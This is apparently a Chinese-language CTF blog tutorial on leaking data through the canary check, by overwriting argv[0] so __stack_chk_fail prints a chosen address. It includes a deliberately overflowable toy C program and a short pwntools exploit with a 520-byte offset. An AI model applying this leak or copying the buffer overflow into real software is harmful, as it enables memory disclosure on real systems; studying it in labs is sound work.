Canary--利用__stack_chk_fail函数泄露数据

Chiu Lv4
  2024-07-31 13:56:29 2024-07-31 13:56:29 Created   2024-07-31 13:57:13 2024-07-31 13:57:13 Updated    

__stack_chk_fail 函数输出错误信息时会把 __libc_argv[0] 作为信息输出,也就是 main 函数参数的 argv[0],这个参数保存在栈中,如果可以覆盖该参数,也就可以打印出需要泄露的信息。

注意高版本的 libc 的 __fortify_fail 函数并不会打印 __libc_argv[0]

1
2
3
4
5
6
7
8
9
10
11
void __attribute__ ((noreturn)) __stack_chk_fail (void)
{
  __fortify_fail ("stack smashing detected");
}
  
void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)
{
  /* The loop is added only to keep gcc happy.  */
  while (1)
    __libc_message (2, "*** %s ***: %s terminated\n",
                    msg, __libc_argv[0] ?: "<unknown>");//这里简单理解成打印出报错信息即可,也就是可以泄露信息

示例程序:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#include<stdio.h>
#include<string.h>
#include <unistd.h>
 
const char flag[] = "flag{this_is_a_flag}";
 
void vuln() {
    char buf[0x100];
    puts("please input:");
    read(0, buf, 0x1000);
}
 
int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
 
    vuln();
 
    return 0;
}
 
// gcc pwn.c -o pwn -no-pie -g

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *
 
elf = ELF("./pwn")
context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'
p = process([elf.path])
 
gdb.attach(p, "b __stack_chk_fail\nc")
pause()

#用'cyclic 0x500'生成padding,然后发送过去,'print __libc_argv[0]'指令在内存中找到其值为'paaaaaac',然后用'cyclic -l paaaaaac'算出偏移为520
# p.sendafter("please input:", 'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaaezaaaaaafbaaaaaafcaaaaaafdaaaaaafeaaaaaaffaaaaaafgaaaaaafhaaaaaafiaaaaaafjaaaaaafkaaaaaaflaaaaaafmaaaaaafnaaaaaafoaaaaaafpaaaaaafqaaaaaafraaaaaafsaaaaaaftaaaaaafuaaaaaafvaaaaaafwaaaaaafxaaaaaafyaaaaaafzaaaaaagbaaaaaagcaaaaaagdaaaaaageaaaaaagfaaaaaaggaaaaaaghaaaaaagiaaaaaagjaaaaaag')
 
p.sendafter("please input:", 'a' * 520 + p64(elf.sym['flag']))#.symtab段包含函数、变量和其他符号的名称、类型和地址
p.interactive()

image-20240224174126427

image-20240224174239323

  • Title: Canary--利用__stack_chk_fail函数泄露数据
  • Author: Chiu
  • Created at : 2024-07-31 13:56:29
  • Updated at : 2024-07-31 13:57:13
  • Link: https://github.com/Idealist17/github.io/2024/07/31/Canary-利用-stack-chk-fail函数泄露数据/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
Canary--利用__stack_chk_fail函数泄露数据
  1. 示例程序:
  2. exp: